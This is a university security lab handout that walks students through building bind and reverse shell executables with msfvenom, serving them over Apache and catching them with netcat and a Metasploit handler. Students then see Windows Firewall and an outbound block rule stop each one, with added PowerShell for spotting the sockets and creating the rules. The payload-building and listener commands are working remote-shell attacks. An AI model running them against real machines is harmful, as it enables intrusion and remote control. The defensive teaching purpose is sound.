15: Windows Firewall (30 pts. + 15 pts. extra credit)

What You Need

Purpose

We will use Windows Firewall to block some common attacks: a bind shell and a reverse shell.

Task 15.1: Bind Shell (10 pts.)

Understanding a Bind Shell

A bind shell listens on the target system on a TCP or UDP port and waits for the attacker to connect in. This is a very simple attack, and very easily stopped by a firewall: the default action of Windows Firewall is to block unsolicited inbound connections, and that alone stops it.

Using Msfvenom to Make a Bind Shell

In Kali, execute this command to learn about the "windows/shell_bind_tcp" payload:
msfvenom -p windows/shell_bind_tcp --payload-options
Note: in later versions, the switch was changed from --payload-options to --list-options

This is a very simple payload, as shown below. It doesn't require any parameters, and listens on port 4444 by default, serving up a CMD shell.

In Kali, execute these commands to create a malicious Windows executable file named "shell_bind.exe" and serve it from a malicious Web server.

msfvenom -p windows/shell_bind_tcp -f exe > /var/www/html/shell_bind.exe
service apache2 start
The operation proceeds without errors, as shown below.

Finding the Attacker's IP Address

On your Linux machine, in a Terminal window, execute this command:
ifconfig
Find your IP address and make a note of it. In the example below, it is 172.16.1.203.

Turning Off Windows Firewall

On your Windows desktop, click the Start button and type Firewall.

In the search results, click "Windows Firewall", which is the second result in the image below.

In the "Windows Firewall", on the left side, click "Turn Windows Firewall on or off".

In the "Customize Settings" box, click both Off buttons, as shown below.

Click OK.

Close the "Windows Firewall" box.

Launching the Bind Shell on the Target Machine

On the target Windows machine, open Internet Explorer (not Chrome) and open this URL, replacing the IP address with the IP address of your Kali machine:
http://172.16.1.203/shell_bind.exe
The file "shell_bind.exe" downloads.

If warning boxes appear, such as those shown below, click Actions, "More options", "Run anyway".

Note: if you are using antivirus, you will need to disable it. You will also need to disable Windows Defender's "realtime protection", as explained in Project 2.

Viewing the Listening Process

On your Windows machine, click Start and type CMD.

In the results, right-click "Command Prompt" and click "Run as administrator", as shown below.

If a User Account Control box pops up, click Yes.

In the Administrator Command Prompt window, execute this command, which shows information about all processes using network connections. (The -b switch, which shows the executable that owns each socket, is why the prompt has to run as administrator.)

netstat -bano | more
You can see the shell_bind.exe process listening on port 4444, as shown below.

Finding the Windows Server's IP Address

In the Administrator Command Prompt window, execute this command, to find your IP address.
ipconfig | more
Find your Windows server's IP address, as shown below.

Using the Bind Shell

On your Kali machine, execute this command, replacing the IP address with the IP address of your Windows server:
nc 172.16.1.208 4444
A "Microsoft Windows" banner appears, as shown below. You are now typing into a CMD shell on the Windows server. Execute this command in it to view the network connection you are using.
netstat -an | findstr 4444
A connection to the Windows server on port 4444 appears, with its status on the right side, covered by a gray box in the image below.

15.1: Recording Your Success (10 pts.)

Use the form below to record your score in Canvas.

If you don't have a Canvas account, see the instructions here.

Name or Email:
Connection Status:

Turning On Windows Firewall

On your Windows desktop, click the Start button and type Firewall.

In the search results, click "Windows Firewall".

In the "Windows Firewall", on the left side, click "Turn Windows Firewall on or off".

In the "Customize Settings" box, click both On buttons, as shown below.

Click OK.

Close the "Windows Firewall" box.

Attempting to Use the Bind Shell

On your Kali machine, in the Terminal window running "nc", press Enter, and try typing a command, such as help. You get no response, as shown below. The firewall is now dropping the inbound packets of your connection, so you can no longer control the Windows machine.


Task 15.2: Reverse Shell (10 pts.)

Understanding a Reverse Shell

A reverse shell originates the connection from the target server, sending a SYN out to the attacker's Command & Control server, which listens for incoming traffic.

In its default state, Windows Firewall allows all outbound connections, so the reverse shell gets out on port 4444 without any trouble. Even a stricter policy must allow connections to external IP addresses on common ports such as 80 and 443 if the computer is to browse the Web, and a reverse shell can use those ports just as easily. So this attack works even when Windows Firewall is on, in its default state.

Using Msfvenom to Make a Reverse Shell

In Kali, execute this command to learn about the "windows/shell_reverse_tcp" payload:
msfvenom -p windows/shell_reverse_tcp --payload-options
This payload requires only one parameter: LHOST, the address the target connects back to, as shown below.

Troubleshooting

If msfvenom crashes, with an "undefined method 'supported_ssl_methods'" message, as shown below:

you can fix it by installing a "nightly build" with these commands:


cd /tmp
wget https://apt.metasploit.com/pool/main/m/metasploit-framework/metasploit-framework_4.17.0%2B20180814103546.git.3.27bab54~1rapid7-1_amd64.deb
rm -rf /usr/share/metasploit-framework
dpkg -i metasploit-framework_4.17.0%2B20180814103546.git.3.27bab54~1rapid7-1_amd64.deb
For more information, see Metasploit Nightly Installers.
In Kali, execute this command to create a malicious Windows executable file named "shell_reverse.exe", replacing the IP address with the IP address of your Kali machine.
msfvenom -p windows/shell_reverse_tcp LHOST=172.16.1.130 -f exe > /var/www/html/shell_reverse.exe
The operation proceeds without errors, as shown below.

Starting a Command-and-Control (C&C) Server

Execute these commands to start a C&C listener. LPORT is left at its default of 4444, which matches the payload.
msfconsole
use multi/handler
set PAYLOAD windows/shell_reverse_tcp
set LHOST 0.0.0.0
exploit
Metasploit starts a "reverse TCP handler", as shown below.

Launching the Reverse Shell on the Target Machine

On the target Windows machine, open Internet Explorer (not Chrome) and open this URL, replacing the IP address with the IP address of your Kali machine:
http://172.16.1.130/shell_reverse.exe
The file "shell_reverse.exe" downloads.

If warning boxes appear, such as those shown below, click Actions, "More options", "Run anyway".

Note: if you are using antivirus, you will need to disable it. You will also need to disable Windows Defender's "realtime protection", as explained in Project 2.

Using the Reverse Shell

On your Kali machine, a "Command shell session" opens and a "Microsoft Windows" banner appears, as shown below. You are now typing into a CMD shell on the Windows machine. Execute this command in it to view the process you are using.

tasklist /V /FI "IMAGENAME eq shell*"
Find the entry starting with shell_reverse.exe, as shown below. Look at the "Session Name", which is covered by a gray box in the image below.

Enter that name in the form below to record your success.
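To see the two connection shapes side by side on the Windows machine, here is an added PowerShell example that is not part of the original lab. It does the job of the "netstat -bano" check in Task 15.1 and the "tasklist /V" check above with Get-NetTCPConnection, and it makes the point the two tasks are built on: a bind shell is a listening socket, a reverse shell is an established connection to the attacker's port. It assumes Windows 8 / Server 2012 or later (Get-NetTCPConnection is in the NetTCPIP module; Windows 7 has only netstat), an elevated prompt so the owning process resolves for every socket, and the default port 4444 that both payloads on this page use. The function name is my own.

```powershell
# Added example, not part of the original lab. Assumes Windows 8 / Server 2012 or
# later (Get-NetTCPConnection lives in the NetTCPIP module), an elevated prompt,
# and the payloads' default port 4444.
$Port = 4444

function Get-SocketOwner {
    # Resolve the PID that Get-NetTCPConnection reports to an image path.
    # Path is empty for protected/system processes even when elevated, so fall
    # back to the process name; the PID may also have exited since the snapshot.
    param([Parameter(Mandatory)] [int]$ProcessId)
    $p = Get-Process -Id $ProcessId -ErrorAction SilentlyContinue
    if ($null -eq $p) { return "<pid $ProcessId exited>" }
    if ($p.Path)      { return $p.Path }
    return $p.ProcessName
}

# Task 15.1 shape: a bind shell is a LISTENING socket owned by an ordinary user
# process. This is the PowerShell equivalent of "netstat -bano | findstr 4444".
# A filter that matches nothing raises a CIM error, hence SilentlyContinue.
Write-Host "Listening on TCP/$Port (bind shell):"
Get-NetTCPConnection -State Listen -LocalPort $Port -ErrorAction SilentlyContinue |
    ForEach-Object {
        [pscustomobject]@{
            Local = "$($_.LocalAddress):$($_.LocalPort)"
            PID   = $_.OwningProcess
            Image = Get-SocketOwner -ProcessId $_.OwningProcess
        }
    } | Format-Table -AutoSize

# Task 15.2 shape: a reverse shell never listens. It is an ESTABLISHED connection
# whose REMOTE port is the handler's port, so filter on RemotePort; that is what
# separates it from ordinary browsing, where the remote port is 80 or 443.
Write-Host "Established to remote TCP/$Port (reverse shell):"
Get-NetTCPConnection -State Established -RemotePort $Port -ErrorAction SilentlyContinue |
    ForEach-Object {
        $proc    = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
        # Same value as the "Session#" column of "tasklist /V" above
        $session = if ($proc) { $proc.SessionId } else { $null }
        [pscustomobject]@{
            Remote  = "$($_.RemoteAddress):$($_.RemotePort)"
            PID     = $_.OwningProcess
            Image   = Get-SocketOwner -ProcessId $_.OwningProcess
            Session = $session
        }
    } | Format-Table -AutoSize

# The asymmetry the lab relies on: the bind shell appears in the first table and
# is stopped by the firewall's default inbound block; the reverse shell appears
# only in the second and is untouched until an outbound rule exists (Task 15.3).
```

Run it while each shell is connected: with shell_bind.exe running, the first table shows the listener; with shell_reverse.exe connected to the Kali handler, the second table shows the established connection and its Session#. On a real incident the filter on RemotePort 4444 would be replaced by the port in your indicator, but the distinction between a listener and an outbound established connection is the same.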

15.2: Recording Your Success (10 pts.)

Use the form below to record your score in Canvas.

If you don't have a Canvas account, see the instructions here.

Name or Email:
Session Name:


Task 15.3: Blocking Outgoing Connections with Windows Firewall (10 pts.)

Opening Windows Firewall with Advanced Security

On your Windows desktop, click the Start button and type Firewall.

In the search results, click "Windows Firewall with Advanced Security", as shown below.

Windows Firewall with Advanced Security opens.

In the left pane, click "Windows Firewall with Advanced Security", as shown below.

In the center pane, check to see that Windows Firewall is On for the Active profile.

In the image below, the "Public Profile is Active", but the firewall is off for the Public profile.

To turn the firewall on, in the center pane, near the bottom, click "Windows Firewall Properties".

In the Properties sheet, on the active tab (Domain, Private, or Public), change the "Firewall state" to "On (recommended)", as shown below. Click OK.

On the left side of "Windows Firewall with Advanced Security", click "Outbound Rules". On the top right, click "New Rule...".

In the "New Outbound Rule Wizard" box, on the "Rule Type" page, click Port, as shown below, and click Next.

In the "New Outbound Rule Wizard" box, on the "Protocol and Ports" page, accept the default selection of TCP. Click "All remote ports", as shown below, and click Next.

In the "New Outbound Rule Wizard" box, on the "Action" page, accept the default selection of Block, and click Next.

In the "New Outbound Rule Wizard" box, on the "Profile" page, accept the default selections, and click Next.

In the "New Outbound Rule Wizard" box, on the "Name" page, enter a name of "NO OUTBOUND CONNECTIONS", as shown below, and click Finish.
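The same rule from an elevated PowerShell prompt, as an added example that is not part of the original lab: it turns the firewall on for every profile first, creates the "NO OUTBOUND CONNECTIONS" rule with the wizard's exact choices, verifies the result, and adds the check a practitioner would want (the wizard rule is TCP-only). It assumes Windows 8 / Server 2012 or later (the NetSecurity module; on Windows 7 the equivalent is netsh advfirewall firewall add rule) and the rule name used above. The function names are my own.

```powershell
# Added example, not part of the original lab. Assumes Windows 8 / Server 2012 or
# later (NetSecurity module) and an elevated prompt. Rule name is the lab's.
$RuleName = 'NO OUTBOUND CONNECTIONS'

function Enable-LabOutboundBlock {
    # Step 1: a block rule in a disabled profile does nothing, so turn the
    # firewall on for every profile first (the lab's screenshot has Public off).
    Set-NetFirewallProfile -Profile Domain,Private,Public -Enabled True

    # Step 2: the wizard's choices: Outbound / Port / TCP / all remote ports /
    # Block / all profiles. Explicit block rules beat allow rules in Windows
    # Firewall, so this stops every outbound TCP flow, not just the shell.
    New-NetFirewallRule -DisplayName $RuleName -Direction Outbound `
        -Protocol TCP -RemotePort Any -Action Block -Profile Any | Out-Null

    # Caveat the wizard rule leaves open: it is TCP-only. UDP (DNS-tunnelled C2,
    # for example) still gets out, so add the UDP twin when the goal really is
    # "no outbound connections".
    New-NetFirewallRule -DisplayName "$RuleName (UDP)" -Direction Outbound `
        -Protocol UDP -RemotePort Any -Action Block -Profile Any | Out-Null
}

function Get-LabOutboundBlock {
    # Step 3: verify. Protocol and port live on the port filter, not on the rule.
    Get-NetFirewallRule -DisplayName "$RuleName*" | ForEach-Object {
        $pf = $_ | Get-NetFirewallPortFilter
        [pscustomobject]@{
            Name       = $_.DisplayName
            Enabled    = $_.Enabled
            Direction  = $_.Direction
            Action     = $_.Action
            Protocol   = $pf.Protocol
            RemotePort = $pf.RemotePort
        }
    }
}

function Remove-LabOutboundBlock {
    # Step 4 ("Restoring the Firewall to Normal Operation"): remove just these
    # two rules. "netsh advfirewall reset" is the CLI equivalent of the
    # "Restore defaults" button and wipes every custom rule.
    Remove-NetFirewallRule -DisplayName "$RuleName*"
}

Enable-LabOutboundBlock
Get-NetFirewallProfile | Select-Object Name, Enabled, DefaultOutboundAction
Get-LabOutboundBlock | Format-Table -AutoSize
# Run Remove-LabOutboundBlock when you are done with the lab.
```

Expect the verification table to list both rules as Enabled True, Direction Outbound, Action Block, RemotePort Any. The moment the TCP rule is created, the existing reverse-shell connection is cut, which is what the next step shows from the Kali side.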

Viewing the Kali Reverse Shell Handler

On your Kali machine, click in the window showing your connected shell and press Enter.

The reverse shell closes, as shown below.

Find the "Reason", covered in a gray box in the image below.

Enter that reason into the form below to record your success.

15.3 Recording Your Success (10 pts.)

Use the form below to record your score in Canvas.

If you don't have a Canvas account, see the instructions here.

Name or Email:
Reason:

Restoring the Firewall to Normal Operation

To make your Windows machine useful for other projects again, do this:

Click Start, type CONTROL, and open Control Panel.

Click "System and Security".

Click "Windows Firewall".

On the left pane, click "Restore defaults", as shown below.

Click "Restore defaults".

Click Yes to confirm.


Task 15.4: Reverse Shell on Linux (15 pts. extra credit)

Set up an Ubuntu Linux machine, create reverse-shell malware on Kali, and run it, as shown below.

On Kali, in the reverse shell (the command runs on the Ubuntu machine), execute this command:

netstat -pant
Find the connection to port 4444, highlighted in the image below.

Find the "PID/Program name" value for this connection, covered by a gray box in the image below.

Enter the "PID/Program name" value in the form below to record your success.

15.4 Recording Your Success (15 pts. extra credit)

Use the form below to record your score in Canvas.

If you don't have a Canvas account, see the instructions here.

Name or Email:
PID/Program name:

Blocking Outgoing Connections with ufw

Open another Terminal on your Ubuntu server and use the commands shown below to block the reverse shell.

To turn the firewall off again, execute this command:

sudo ufw disable

Sources

Metasploit Nightly Installers

Posted 8-14-18
Firewall "On" steps added 11-6-18